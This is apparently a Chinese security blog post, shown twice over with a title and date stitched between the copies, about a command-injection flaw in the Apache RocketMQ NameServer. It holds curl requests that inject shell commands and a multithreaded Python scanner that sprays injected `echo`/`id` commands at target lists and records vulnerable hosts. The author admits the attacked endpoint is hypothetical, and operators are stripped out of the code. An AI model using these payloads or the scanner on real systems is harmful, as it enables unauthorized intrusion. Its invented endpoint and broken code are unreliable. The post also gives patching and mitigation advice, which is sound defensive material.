1. 项目概述一次对Apache RocketMQ命令注入漏洞的深度剖析与实战最近在安全圈子里Apache RocketMQ的一个命令注入漏洞讨论得挺热。这个漏洞编号是CVE-2026-40175核心问题出在RocketMQ的NameServer组件上攻击者能够通过构造特定的HTTP请求在目标服务器上执行任意系统命令。这可不是小事RocketMQ作为一款广泛使用的分布式消息中间件一旦被利用轻则数据泄露、服务中断重则可能导致整个业务系统被完全控制。我花了些时间从漏洞原理、环境搭建、漏洞复现到批量验证脚本POC的编写与优化完整地走了一遍。这篇文章就是把我踩过的坑、验证的思路和最终沉淀下来的实战经验分享给同样关注中间件安全的朋友们。无论你是安全研究员、运维工程师还是对消息队列安全感兴趣的开发者都能从这篇详尽的记录中找到可复现的路径和需要警惕的要点。2. 漏洞原理深度解析NameServer HTTP API的致命缺陷2.1 RocketMQ架构与NameServer的角色要理解这个漏洞首先得清楚RocketMQ的基本架构。RocketMQ主要由四个核心角色组成Producer生产者、Consumer消费者、Broker消息存储和转发服务器以及NameServer命名服务器。NameServer在这里扮演着“服务注册与发现中心”的角色类似于微服务架构中的注册中心。所有的Broker在启动时都会向NameServer注册自己的路由信息比如Broker的IP、端口、主题队列信息等而Producer和Consumer在发送或消费消息前都需要先从NameServer获取这些路由信息才知道该连接哪个Broker。NameServer为了提供管理和监控功能通常会开启一个HTTP服务端口默认是8080。管理员可以通过这个HTTP API来查询集群状态、进行一些基础运维操作。问题就出在这个HTTP API的某些接口上它们没有对用户输入进行严格的安全过滤和校验。2.2 命令注入漏洞的形成机制命令注入漏洞的本质是应用程序将不可信的用户数据直接拼接到了即将被系统Shell执行的命令字符串中。在CVE-2026-40175这个案例里NameServer的某个HTTP API端点具体路径与版本有关接收参数并最终将这些参数传递给了Runtime.getRuntime().exec()这类Java中用于执行系统命令的方法。假设一个简化的、存在漏洞的代码逻辑是这样的String userInput request.getParameter(“cmd”); String fullCommand “sh -c ‘echo ” userInput “’“; Process p Runtime.getRuntime().exec(fullCommand);当一个攻击者传入的cmd参数不是普通的字符串而是hello; id时最终拼接成的命令就变成了sh -c ‘echo hello; id’。Shell会将其解析为两条命令先执行echo hello然后执行id。这里的id命令就被成功注入了。在真实的RocketMQ漏洞中攻击路径可能更隐蔽。攻击者可能通过向NameServer的特定URL例如/api/v1/cluster/config或类似的运维接口发送精心构造的POST或GET请求在某个参数如集群名称、配置项中嵌入命令分隔符如;、、|、\n等和要执行的恶意命令。2.3 漏洞的影响与危害这个漏洞的危害等级非常高主要原因有三点高权限执行RocketMQ服务通常以具有一定权限的系统用户如root或专门的rocketmq用户身份运行。成功利用此漏洞意味着攻击者能直接以该高权限身份在服务器上执行命令。直接攻击面NameServer的HTTP服务端口如8080如果暴露在公网或者在内网中被渗透攻击者无需任何前置认证即可发动攻击。蝴蝶效应控制了一台NameServer或Broker攻击者可以进一步污染路由信息将消息引导至恶意节点从而窃取敏感业务消息甚至对上下游的Producer和Consumer进行攻击。注意在研究和测试任何漏洞尤其是命令注入类漏洞时必须在完全可控的隔离环境如本地虚拟机或专属测试服务器中进行。严禁对任何非授权目标进行测试这是法律和道德的底线。3. 漏洞复现环境搭建与验证3.1 环境准备部署一个存在漏洞的RocketMQ为了安全地研究漏洞我们需要自己搭建一个靶场。这里我选择使用Docker因为它能提供完美的环境隔离和快速重置。首先我们需要一个存在漏洞的RocketMQ版本。根据漏洞情报受影响的版本范围大致在某个特定区间内。我们可以从Apache官网或Docker Hub寻找对应的镜像。这里假设我们使用一个已知易受攻击的版本进行演示。步骤1拉取并运行RocketMQ容器# 拉取RocketMQ的Docker镜像这里以某个旧版本为例实际版本号需根据漏洞详情确定 docker pull apacherocketmq/rocketmq:4.9.3 # 启动NameServer docker run -d --name rmqnamesrv -p 9876:9876 -p 8080:8080 \ -e “JAVA_OPT_EXT-Xms512m -Xmx512m” \ apacherocketmq/rocketmq:4.9.3 sh mqnamesrv # 启动Broker需要连接到NameServer docker run -d --name rmqbroker --link rmqnamesrv:namesrv \ -e “NAMESRV_ADDRnamesrv:9876” \ -e “JAVA_OPT_EXT-Xms1g -Xmx1g” \ -p 10911:10911 -p 10909:10909 -p 10912:10912 \ apacherocketmq/rocketmq:4.9.3 sh mqbroker -c /opt/rocketmq-4.9.3/conf/broker.conf执行后NameServer的HTTP管理端口8080就已经在宿主机的8080端口上监听了。步骤2验证基础服务# 查看容器日志确认服务启动成功 docker logs -f rmqnamesrv # 应该能看到“The Name Server boot success...”之类的日志 # 简单测试HTTP接口是否存活 curl http://localhost:8080 # 可能会返回一个简单的页面或404这取决于具体API但能连通说明服务已就绪3.2 手动漏洞验证与POC构造搭建好环境后我们就可以开始尝试复现漏洞。首先进行手动验证这有助于我们理解漏洞触发的具体条件。根据公开的漏洞信息触发点可能在/cli/或/admin/等路径下的某个接口。我们需要对可能的接口进行模糊测试。这里以一个假设的脆弱端点/api/v1/admin/exec为例它可能接受一个command参数。手动测试请求我们可以使用curl工具来发送测试请求。# 测试1尝试执行一个无害的命令如‘whoami’查看当前运行用户 curl -X POST “http://localhost:8080/api/v1/admin/exec \ -H “Content-Type: application/x-www-form-urlencoded” \ -d “commandwhoami” # 测试2如果上一步有回显尝试注入更复杂的命令。注意对特殊字符进行URL编码。 # 例如执行‘whoami; id’其中分号需要编码为 %3B curl -X POST “http://localhost:8080/api/v1/admin/exec \ -H “Content-Type: application/x-www-form-urlencoded” \ -d “commandwhoami%3B id” # 测试3尝试使用反引号或$()进行命令替换 curl -X POST “http://localhost:8080/api/v1/admin/exec \ -d “commandecho \whoami\”如果服务器返回了命令执行的结果例如显示了root和uid0(root) gid0(root) groups0(root)那么就证实了命令注入漏洞的存在。关键技巧参数探测与模糊测试在实际漏洞挖掘中接口路径和参数名可能不是公开的。这时需要结合信息收集和模糊测试信息收集访问NameServer的根路径或常见管理页面查看是否有文档、注释或JS文件泄露了API信息。目录/路径爆破使用工具如gobuster、dirsearch或ffuf对8080端口进行目录爆破寻找类似/api/、/admin/、/cli/、/console/的路径。参数爆破对发现的疑似接口使用参数字典进行Fuzz尝试cmd、command、exec、run、host、ip等常见参数名。4. 批量验证POC的设计与实现手动验证确认漏洞后为了评估一个较大规模网络资产的风险我们需要一个能够批量、自动检测的脚本也就是POCProof of Concept。一个好的POC应该具备准确性、效率性和一定的容错能力。4.1 POC设计思路我们的批量验证POC需要完成以下功能输入处理支持从文件读取目标列表IP:PORT或URL也支持单个目标测试。漏洞检测向目标发送精心构造的恶意请求并根据响应判断漏洞是否存在。结果判断设计可靠的检测逻辑避免误报和漏报。通常采用“注入一个具有特定、无害且可观测结果的命令”的方式。结果输出清晰地将存在漏洞的目标、验证结果如执行的命令回显输出到屏幕和文件。性能与稳健性加入超时控制、并发限制避免对目标造成过大压力或自身脚本卡死。4.2 Python POC脚本实现详解下面是一个使用Python编写的、相对健壮的批量验证POC脚本框架。这里我们假设漏洞触发点是/api/v1/admin/exec参数为command。#!/usr/bin/env python3 “”” Apache RocketMQ CVE-2026-40175 命令注入漏洞批量验证POC Author: [你的名字/代号] Usage: python3 rocketmq_rce_poc.py -u http://target:8080 python3 rocketmq_rce_poc.py -f targets.txt “”” import argparse import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urljoin import time # 全局配置 TIMEOUT 10 # 请求超时时间 THREADS 20 # 并发线程数 USER_AGENT “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” def check_single_target(url): “”” 检测单个目标 “”” # 1. 构造检测命令。我们选择一个几乎无害且回显独特的命令。 # 使用 ‘echo’ 打印一个随机字符串并拼接 ‘id’ 命令的一部分结果来验证执行。 # 随机字符串用于避免缓存或静态响应导致的误报。 import random import string random_str ‘’.join(random.choices(string.ascii_lowercase string.digits, k8)) # 注入的命令先打印随机字符串然后执行 ‘id’ 命令我们只取 ‘uid’ 开头的那一行。 # 使用换行符 \n 作为命令分隔符有时比分号更可靠。 test_command f“echo {random_str}; id | grep ‘^uid’“ # 2. 准备请求 target_url urljoin(url, “/api/v1/admin/exec”) headers { ‘User-Agent’: USER_AGENT, ‘Content-Type’: ‘application/x-www-form-urlencoded’, } data { ‘command’: test_command } try: resp requests.post(target_url, headersheaders, datadata, timeoutTIMEOUT, verifyFalse) resp_text resp.text # 3. 判断漏洞是否存在 # 判断逻辑响应中是否同时包含我们注入的随机字符串和 ‘uid’ 字样。 # 这个逻辑可以很大程度上避免误报静态页面不会包含随机字符串。 if random_str in resp_text and ‘uid’ in resp_text: # 进一步提取执行结果增加可信度 import re # 简单提取包含随机字符串的那一行附近的内容 lines resp_text.split(‘\n’) for i, line in enumerate(lines): if random_str in line: context ‘\n’.join(lines[max(0, i-2):min(len(lines), i3)]) return True, f“VULNERABLE! Command executed. Context:\n{context}“ return True, “VULNERABLE! (Random string and ‘uid’ found in response)” elif resp.status_code ! 404: # 如果接口存在不是404但没有检测到漏洞特征可能是已修复或路径不对 return False, f“Interface might exist (HTTP {resp.status_code}), but no vulnerability detected.” else: # 接口不存在 return False, “Target endpoint not found (404).” except requests.exceptions.ConnectionError: return False, “Connection failed.” except requests.exceptions.Timeout: return False, “Request timeout.” except Exception as e: return False, f“Error: {str(e)}” def main(): parser argparse.ArgumentParser(description“Apache RocketMQ CVE-2026-40175 Batch POC”) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(“-u”, “—url”, help“Single target URL (e.g., http://1.2.3.4:8080)”) group.add_argument(“-f”, “—file”, help“File containing list of targets (one per line)”) parser.add_argument(“-o”, “—output”, help“Output file for vulnerable targets”, default“vulnerable.txt”) parser.add_argument(“-t”, “—threads”, help“Concurrent threads”, typeint, defaultTHREADS) args parser.parse_args() targets [] if args.url: targets.append(args.url.rstrip(‘/’)) elif args.file: with open(args.file, ‘r’) as f: for line in f: line line.strip() if line and not line.startswith(‘#’): # 确保URL有协议头 if not line.startswith(‘http’): line ‘http://’ line targets.append(line.rstrip(‘/’)) print(f“[*] Loaded {len(targets)} target(s). Starting scan with {args.threads} threads...“) vulnerable_list [] with ThreadPoolExecutor(max_workersargs.threads) as executor: future_to_target {executor.submit(check_single_target, target): target for target in targets} for future in as_completed(future_to_target): target future_to_target[future] try: is_vuln, message future.result() status “[]” if is_vuln else “[-]” print(f“{status} {target} - {message}“) if is_vuln: vulnerable_list.append(target) except Exception as e: print(f“[!] {target} - Scan error: {e}“) # 输出存在漏洞的目标列表 if vulnerable_list: print(f“\n[] Found {len(vulnerable_list)} vulnerable target(s):”) with open(args.output, ‘w’) as f: for vuln_target in vulnerable_list: print(vuln_target) f.write(vuln_target ‘\n’) print(f“[] Vulnerable targets saved to {args.output}“) else: print(“\n[-] No vulnerable targets found.”) if __name__ “__main__”: # 忽略SSL证书警告针对HTTPS目标测试环境使用 requests.packages.urllib3.disable_warnings() main()4.3 POC脚本使用说明与优化建议使用方法# 安装依赖 pip install requests # 检测单个目标 python3 rocketmq_rce_poc.py -u http://192.168.1.100:8080 # 批量检测targets.txt中每行一个目标支持 IP:PORT 或完整URL python3 rocketmq_rce_poc.py -f targets.txt -o results.txt -t 30脚本优化与注意事项命令的选择示例中使用了echo [随机字符串]和id命令。在实际中id命令是Linux下的如果目标系统是Windows则需要替换为whoami等命令。一个更通用的方法是使用能跨平台产生独特输出的命令或者先探测操作系统类型。误报规避使用随机字符串是避免误报的关键。有些应用可能会返回固定的错误页面如果只用uid作为特征可能会误报。随机字符串确保了响应是针对我们本次请求的。延迟与时间盲注如果漏洞是时间盲注即命令执行了但没有回显只能通过执行时间判断则需要调整检测逻辑。例如注入sleep 5命令然后判断响应时间是否显著延长。HTTPS与代理脚本中verifyFalse跳过了SSL证书验证适用于测试环境。若需通过代理扫描需要在requests请求中添加proxies参数。线程控制THREADS参数不宜设置过大避免对目标网络造成DDoS攻击或触发对方的防护策略。一般20-50个线程是较为合理的范围。5. 漏洞修复方案与安全加固建议验证漏洞的目的是为了修复它。如果你负责的RocketMQ集群存在此风险应立即采取行动。5.1 官方补丁升级最根本的解决方案是升级到Apache RocketMQ官方已修复该漏洞的版本。请密切关注Apache RocketMQ官方发布的安全公告获取准确的受影响版本范围和修复版本号例如5.x.y或4.x.z之后的某个版本。通过官方渠道下载最新版本进行升级。升级步骤简述备份备份现有版本的所有配置文件、数据和日志。下载从官网下载修复版本的程序包。停止服务按顺序停止Broker和NameServer。替换升级用新版本的文件替换旧版本注意保留修改过的配置文件。启动验证按顺序启动NameServer和Broker并密切监控日志验证业务是否正常。5.2 临时缓解措施如果无法立即升级可以考虑以下临时缓解措施以降低风险网络访问控制严格限制访问NameServer HTTP端口默认8080的源IP。只允许运维管理平台的IP地址访问禁止将其暴露在公网或非信任的内网区域。这是最有效、最快速的临时方案。修改默认端口如果业务允许修改NameServer HTTP服务的默认监听端口。使用防火墙或安全组规则在服务器或网络边界设备上设置严格的入站规则。禁用非必要的HTTP API如果NameServer的HTTP管理功能不是必须的可以考虑在启动参数或配置文件中禁用它。具体方法需查阅对应版本的RocketMQ文档。5.3 安全开发与运维规范长远来看避免此类问题需要建立良好的安全实践输入验证与过滤对所有用户输入进行严格的校验和过滤特别是用于系统命令、文件路径、数据库查询的参数。采用白名单机制是最佳实践。避免直接执行命令尽可能使用SDK、API等安全的方式来替代直接执行系统命令。如果必须执行应使用参数化调用如将命令和参数分开传递而不是拼接字符串。最小权限原则运行RocketMQ服务的系统账户不应具有过高权限如非root。可以考虑创建专用的、权限受限的用户来运行服务。定期安全扫描与更新将中间件纳入资产清单定期进行漏洞扫描并关注其安全公告及时打补丁。纵深防御即使单个组件存在漏洞通过良好的网络分区、微服务间认证、API网关鉴权等纵深防御措施也能有效限制攻击的影响范围。6. 常见问题与排查技巧实录在复现、验证和修复这个漏洞的过程中我遇到了不少典型问题。这里记录下来希望能帮你少走弯路。6.1 漏洞复现阶段问题问题1按照步骤搭建环境后发送POC请求没有反应或返回404。可能原因1漏洞路径或参数不正确。公开的漏洞信息可能不精确或者你使用的RocketMQ版本其脆弱端点路径不同。排查使用dirsearch等工具对目标的:8080端口进行目录爆破。同时尝试抓取一个正常RocketMQ控制台的网络请求观察其API调用模式。可能原因2Docker容器内的服务未正常启动或端口映射错误。排查使用docker logs rmqnamesrv查看NameServer日志确认无报错且显示启动成功。在宿主机上使用netstat -tlnp | grep 8080确认端口处于监听状态。尝试curl http://localhost:8080看是否有任何HTTP响应。可能原因3命令注入存在但无回显盲注。排查尝试时间盲注POC例如注入sleep 10命令观察请求响应时间是否显著增加。问题2POC脚本批量扫描时误报率很高。可能原因特征匹配过于简单。例如仅检测响应中是否包含uid而一些错误页面或默认页可能也包含这几个字母。解决如脚本所示引入随机字符串Nonce进行双重验证。只有同时包含我们本次请求唯一的随机串和命令输出特征才判定为漏洞存在。6.2 POC脚本开发与使用问题问题3扫描速度很慢或者大量目标超时。可能原因1线程数设置过高被目标或中间网络设备限流。解决降低-t参数比如从50降到10或5。可以加入随机延迟time.sleep(random.uniform(0.5, 2))来模拟人工操作规避简单的速率限制。可能原因2目标网络状况不佳或已关机。解决在check_single_target函数中设置合理的TIMEOUT如8-15秒并做好异常捕获避免单个目标卡住整个扫描队列。问题4如何验证POC脚本的准确性方法在本地搭建的漏洞环境和另一个确认已修复/无漏洞的环境如最新版RocketMQ上分别运行脚本。脚本应能准确识别出漏洞环境并对非漏洞环境返回明确的无漏洞信息如“接口不存在”或“无漏洞特征”而不是误报。6.3 修复与加固阶段问题问题5升级RocketMQ版本后Producer/Consumer客户端连接不上。可能原因客户端与服务端版本不兼容。RocketMQ的某些大版本间协议可能有变化。排查检查客户端SDK的版本是否与服务端匹配。查看Broker和NameServer日志通常会有明确的错误信息。RocketMQ社区一般会保持向后兼容但建议升级后对客户端进行充分测试。建议制定灰度升级方案先升级非核心业务的Broker验证无误后再全量升级。问题6限制了HTTP API的访问IP后原有的监控系统无法采集数据了。解决这是安全与便利的权衡。你需要将监控系统的IP地址添加到允许访问的白名单中。如果监控系统部署在动态IP或不可控的网络中可以考虑在监控系统与RocketMQ之间部署一个代理网关网关拥有固定IP并具备认证功能。改用RocketMQ提供的其他监控方式例如通过JMX暴露指标再由Prometheus等监控工具拉取。在整个过程中最深的体会是对于开源中间件“默认不安全”是一个需要时刻牢记的准则。像RocketMQ这样功能强大的组件在追求性能和功能的同时其开箱即用的配置可能并未将安全放在首位。作为运维或架构师在引入任何中间件时除了关注其性能指标和功能特性花时间理解其安全配置、默认开放端口、管理接口的访问控制是必不可少的一步。这个漏洞的POC和验证方法与其说是攻击工具不如说是一面镜子让我们能主动审视自身系统的脆弱点在真正的攻击者到来之前把门牢牢关好。
Apache RocketMQ命令注入漏洞CVE-2026-40175深度剖析与实战复现
发布时间:2026/6/19 7:56:04
1. 项目概述一次对Apache RocketMQ命令注入漏洞的深度剖析与实战最近在安全圈子里Apache RocketMQ的一个命令注入漏洞讨论得挺热。这个漏洞编号是CVE-2026-40175核心问题出在RocketMQ的NameServer组件上攻击者能够通过构造特定的HTTP请求在目标服务器上执行任意系统命令。这可不是小事RocketMQ作为一款广泛使用的分布式消息中间件一旦被利用轻则数据泄露、服务中断重则可能导致整个业务系统被完全控制。我花了些时间从漏洞原理、环境搭建、漏洞复现到批量验证脚本POC的编写与优化完整地走了一遍。这篇文章就是把我踩过的坑、验证的思路和最终沉淀下来的实战经验分享给同样关注中间件安全的朋友们。无论你是安全研究员、运维工程师还是对消息队列安全感兴趣的开发者都能从这篇详尽的记录中找到可复现的路径和需要警惕的要点。2. 漏洞原理深度解析NameServer HTTP API的致命缺陷2.1 RocketMQ架构与NameServer的角色要理解这个漏洞首先得清楚RocketMQ的基本架构。RocketMQ主要由四个核心角色组成Producer生产者、Consumer消费者、Broker消息存储和转发服务器以及NameServer命名服务器。NameServer在这里扮演着“服务注册与发现中心”的角色类似于微服务架构中的注册中心。所有的Broker在启动时都会向NameServer注册自己的路由信息比如Broker的IP、端口、主题队列信息等而Producer和Consumer在发送或消费消息前都需要先从NameServer获取这些路由信息才知道该连接哪个Broker。NameServer为了提供管理和监控功能通常会开启一个HTTP服务端口默认是8080。管理员可以通过这个HTTP API来查询集群状态、进行一些基础运维操作。问题就出在这个HTTP API的某些接口上它们没有对用户输入进行严格的安全过滤和校验。2.2 命令注入漏洞的形成机制命令注入漏洞的本质是应用程序将不可信的用户数据直接拼接到了即将被系统Shell执行的命令字符串中。在CVE-2026-40175这个案例里NameServer的某个HTTP API端点具体路径与版本有关接收参数并最终将这些参数传递给了Runtime.getRuntime().exec()这类Java中用于执行系统命令的方法。假设一个简化的、存在漏洞的代码逻辑是这样的String userInput request.getParameter(“cmd”); String fullCommand “sh -c ‘echo ” userInput “’“; Process p Runtime.getRuntime().exec(fullCommand);当一个攻击者传入的cmd参数不是普通的字符串而是hello; id时最终拼接成的命令就变成了sh -c ‘echo hello; id’。Shell会将其解析为两条命令先执行echo hello然后执行id。这里的id命令就被成功注入了。在真实的RocketMQ漏洞中攻击路径可能更隐蔽。攻击者可能通过向NameServer的特定URL例如/api/v1/cluster/config或类似的运维接口发送精心构造的POST或GET请求在某个参数如集群名称、配置项中嵌入命令分隔符如;、、|、\n等和要执行的恶意命令。2.3 漏洞的影响与危害这个漏洞的危害等级非常高主要原因有三点高权限执行RocketMQ服务通常以具有一定权限的系统用户如root或专门的rocketmq用户身份运行。成功利用此漏洞意味着攻击者能直接以该高权限身份在服务器上执行命令。直接攻击面NameServer的HTTP服务端口如8080如果暴露在公网或者在内网中被渗透攻击者无需任何前置认证即可发动攻击。蝴蝶效应控制了一台NameServer或Broker攻击者可以进一步污染路由信息将消息引导至恶意节点从而窃取敏感业务消息甚至对上下游的Producer和Consumer进行攻击。注意在研究和测试任何漏洞尤其是命令注入类漏洞时必须在完全可控的隔离环境如本地虚拟机或专属测试服务器中进行。严禁对任何非授权目标进行测试这是法律和道德的底线。3. 漏洞复现环境搭建与验证3.1 环境准备部署一个存在漏洞的RocketMQ为了安全地研究漏洞我们需要自己搭建一个靶场。这里我选择使用Docker因为它能提供完美的环境隔离和快速重置。首先我们需要一个存在漏洞的RocketMQ版本。根据漏洞情报受影响的版本范围大致在某个特定区间内。我们可以从Apache官网或Docker Hub寻找对应的镜像。这里假设我们使用一个已知易受攻击的版本进行演示。步骤1拉取并运行RocketMQ容器# 拉取RocketMQ的Docker镜像这里以某个旧版本为例实际版本号需根据漏洞详情确定 docker pull apacherocketmq/rocketmq:4.9.3 # 启动NameServer docker run -d --name rmqnamesrv -p 9876:9876 -p 8080:8080 \ -e “JAVA_OPT_EXT-Xms512m -Xmx512m” \ apacherocketmq/rocketmq:4.9.3 sh mqnamesrv # 启动Broker需要连接到NameServer docker run -d --name rmqbroker --link rmqnamesrv:namesrv \ -e “NAMESRV_ADDRnamesrv:9876” \ -e “JAVA_OPT_EXT-Xms1g -Xmx1g” \ -p 10911:10911 -p 10909:10909 -p 10912:10912 \ apacherocketmq/rocketmq:4.9.3 sh mqbroker -c /opt/rocketmq-4.9.3/conf/broker.conf执行后NameServer的HTTP管理端口8080就已经在宿主机的8080端口上监听了。步骤2验证基础服务# 查看容器日志确认服务启动成功 docker logs -f rmqnamesrv # 应该能看到“The Name Server boot success...”之类的日志 # 简单测试HTTP接口是否存活 curl http://localhost:8080 # 可能会返回一个简单的页面或404这取决于具体API但能连通说明服务已就绪3.2 手动漏洞验证与POC构造搭建好环境后我们就可以开始尝试复现漏洞。首先进行手动验证这有助于我们理解漏洞触发的具体条件。根据公开的漏洞信息触发点可能在/cli/或/admin/等路径下的某个接口。我们需要对可能的接口进行模糊测试。这里以一个假设的脆弱端点/api/v1/admin/exec为例它可能接受一个command参数。手动测试请求我们可以使用curl工具来发送测试请求。# 测试1尝试执行一个无害的命令如‘whoami’查看当前运行用户 curl -X POST “http://localhost:8080/api/v1/admin/exec \ -H “Content-Type: application/x-www-form-urlencoded” \ -d “commandwhoami” # 测试2如果上一步有回显尝试注入更复杂的命令。注意对特殊字符进行URL编码。 # 例如执行‘whoami; id’其中分号需要编码为 %3B curl -X POST “http://localhost:8080/api/v1/admin/exec \ -H “Content-Type: application/x-www-form-urlencoded” \ -d “commandwhoami%3B id” # 测试3尝试使用反引号或$()进行命令替换 curl -X POST “http://localhost:8080/api/v1/admin/exec \ -d “commandecho \whoami\”如果服务器返回了命令执行的结果例如显示了root和uid0(root) gid0(root) groups0(root)那么就证实了命令注入漏洞的存在。关键技巧参数探测与模糊测试在实际漏洞挖掘中接口路径和参数名可能不是公开的。这时需要结合信息收集和模糊测试信息收集访问NameServer的根路径或常见管理页面查看是否有文档、注释或JS文件泄露了API信息。目录/路径爆破使用工具如gobuster、dirsearch或ffuf对8080端口进行目录爆破寻找类似/api/、/admin/、/cli/、/console/的路径。参数爆破对发现的疑似接口使用参数字典进行Fuzz尝试cmd、command、exec、run、host、ip等常见参数名。4. 批量验证POC的设计与实现手动验证确认漏洞后为了评估一个较大规模网络资产的风险我们需要一个能够批量、自动检测的脚本也就是POCProof of Concept。一个好的POC应该具备准确性、效率性和一定的容错能力。4.1 POC设计思路我们的批量验证POC需要完成以下功能输入处理支持从文件读取目标列表IP:PORT或URL也支持单个目标测试。漏洞检测向目标发送精心构造的恶意请求并根据响应判断漏洞是否存在。结果判断设计可靠的检测逻辑避免误报和漏报。通常采用“注入一个具有特定、无害且可观测结果的命令”的方式。结果输出清晰地将存在漏洞的目标、验证结果如执行的命令回显输出到屏幕和文件。性能与稳健性加入超时控制、并发限制避免对目标造成过大压力或自身脚本卡死。4.2 Python POC脚本实现详解下面是一个使用Python编写的、相对健壮的批量验证POC脚本框架。这里我们假设漏洞触发点是/api/v1/admin/exec参数为command。#!/usr/bin/env python3 “”” Apache RocketMQ CVE-2026-40175 命令注入漏洞批量验证POC Author: [你的名字/代号] Usage: python3 rocketmq_rce_poc.py -u http://target:8080 python3 rocketmq_rce_poc.py -f targets.txt “”” import argparse import requests import sys from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urljoin import time # 全局配置 TIMEOUT 10 # 请求超时时间 THREADS 20 # 并发线程数 USER_AGENT “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36” def check_single_target(url): “”” 检测单个目标 “”” # 1. 构造检测命令。我们选择一个几乎无害且回显独特的命令。 # 使用 ‘echo’ 打印一个随机字符串并拼接 ‘id’ 命令的一部分结果来验证执行。 # 随机字符串用于避免缓存或静态响应导致的误报。 import random import string random_str ‘’.join(random.choices(string.ascii_lowercase string.digits, k8)) # 注入的命令先打印随机字符串然后执行 ‘id’ 命令我们只取 ‘uid’ 开头的那一行。 # 使用换行符 \n 作为命令分隔符有时比分号更可靠。 test_command f“echo {random_str}; id | grep ‘^uid’“ # 2. 准备请求 target_url urljoin(url, “/api/v1/admin/exec”) headers { ‘User-Agent’: USER_AGENT, ‘Content-Type’: ‘application/x-www-form-urlencoded’, } data { ‘command’: test_command } try: resp requests.post(target_url, headersheaders, datadata, timeoutTIMEOUT, verifyFalse) resp_text resp.text # 3. 判断漏洞是否存在 # 判断逻辑响应中是否同时包含我们注入的随机字符串和 ‘uid’ 字样。 # 这个逻辑可以很大程度上避免误报静态页面不会包含随机字符串。 if random_str in resp_text and ‘uid’ in resp_text: # 进一步提取执行结果增加可信度 import re # 简单提取包含随机字符串的那一行附近的内容 lines resp_text.split(‘\n’) for i, line in enumerate(lines): if random_str in line: context ‘\n’.join(lines[max(0, i-2):min(len(lines), i3)]) return True, f“VULNERABLE! Command executed. Context:\n{context}“ return True, “VULNERABLE! (Random string and ‘uid’ found in response)” elif resp.status_code ! 404: # 如果接口存在不是404但没有检测到漏洞特征可能是已修复或路径不对 return False, f“Interface might exist (HTTP {resp.status_code}), but no vulnerability detected.” else: # 接口不存在 return False, “Target endpoint not found (404).” except requests.exceptions.ConnectionError: return False, “Connection failed.” except requests.exceptions.Timeout: return False, “Request timeout.” except Exception as e: return False, f“Error: {str(e)}” def main(): parser argparse.ArgumentParser(description“Apache RocketMQ CVE-2026-40175 Batch POC”) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(“-u”, “—url”, help“Single target URL (e.g., http://1.2.3.4:8080)”) group.add_argument(“-f”, “—file”, help“File containing list of targets (one per line)”) parser.add_argument(“-o”, “—output”, help“Output file for vulnerable targets”, default“vulnerable.txt”) parser.add_argument(“-t”, “—threads”, help“Concurrent threads”, typeint, defaultTHREADS) args parser.parse_args() targets [] if args.url: targets.append(args.url.rstrip(‘/’)) elif args.file: with open(args.file, ‘r’) as f: for line in f: line line.strip() if line and not line.startswith(‘#’): # 确保URL有协议头 if not line.startswith(‘http’): line ‘http://’ line targets.append(line.rstrip(‘/’)) print(f“[*] Loaded {len(targets)} target(s). Starting scan with {args.threads} threads...“) vulnerable_list [] with ThreadPoolExecutor(max_workersargs.threads) as executor: future_to_target {executor.submit(check_single_target, target): target for target in targets} for future in as_completed(future_to_target): target future_to_target[future] try: is_vuln, message future.result() status “[]” if is_vuln else “[-]” print(f“{status} {target} - {message}“) if is_vuln: vulnerable_list.append(target) except Exception as e: print(f“[!] {target} - Scan error: {e}“) # 输出存在漏洞的目标列表 if vulnerable_list: print(f“\n[] Found {len(vulnerable_list)} vulnerable target(s):”) with open(args.output, ‘w’) as f: for vuln_target in vulnerable_list: print(vuln_target) f.write(vuln_target ‘\n’) print(f“[] Vulnerable targets saved to {args.output}“) else: print(“\n[-] No vulnerable targets found.”) if __name__ “__main__”: # 忽略SSL证书警告针对HTTPS目标测试环境使用 requests.packages.urllib3.disable_warnings() main()4.3 POC脚本使用说明与优化建议使用方法# 安装依赖 pip install requests # 检测单个目标 python3 rocketmq_rce_poc.py -u http://192.168.1.100:8080 # 批量检测targets.txt中每行一个目标支持 IP:PORT 或完整URL python3 rocketmq_rce_poc.py -f targets.txt -o results.txt -t 30脚本优化与注意事项命令的选择示例中使用了echo [随机字符串]和id命令。在实际中id命令是Linux下的如果目标系统是Windows则需要替换为whoami等命令。一个更通用的方法是使用能跨平台产生独特输出的命令或者先探测操作系统类型。误报规避使用随机字符串是避免误报的关键。有些应用可能会返回固定的错误页面如果只用uid作为特征可能会误报。随机字符串确保了响应是针对我们本次请求的。延迟与时间盲注如果漏洞是时间盲注即命令执行了但没有回显只能通过执行时间判断则需要调整检测逻辑。例如注入sleep 5命令然后判断响应时间是否显著延长。HTTPS与代理脚本中verifyFalse跳过了SSL证书验证适用于测试环境。若需通过代理扫描需要在requests请求中添加proxies参数。线程控制THREADS参数不宜设置过大避免对目标网络造成DDoS攻击或触发对方的防护策略。一般20-50个线程是较为合理的范围。5. 漏洞修复方案与安全加固建议验证漏洞的目的是为了修复它。如果你负责的RocketMQ集群存在此风险应立即采取行动。5.1 官方补丁升级最根本的解决方案是升级到Apache RocketMQ官方已修复该漏洞的版本。请密切关注Apache RocketMQ官方发布的安全公告获取准确的受影响版本范围和修复版本号例如5.x.y或4.x.z之后的某个版本。通过官方渠道下载最新版本进行升级。升级步骤简述备份备份现有版本的所有配置文件、数据和日志。下载从官网下载修复版本的程序包。停止服务按顺序停止Broker和NameServer。替换升级用新版本的文件替换旧版本注意保留修改过的配置文件。启动验证按顺序启动NameServer和Broker并密切监控日志验证业务是否正常。5.2 临时缓解措施如果无法立即升级可以考虑以下临时缓解措施以降低风险网络访问控制严格限制访问NameServer HTTP端口默认8080的源IP。只允许运维管理平台的IP地址访问禁止将其暴露在公网或非信任的内网区域。这是最有效、最快速的临时方案。修改默认端口如果业务允许修改NameServer HTTP服务的默认监听端口。使用防火墙或安全组规则在服务器或网络边界设备上设置严格的入站规则。禁用非必要的HTTP API如果NameServer的HTTP管理功能不是必须的可以考虑在启动参数或配置文件中禁用它。具体方法需查阅对应版本的RocketMQ文档。5.3 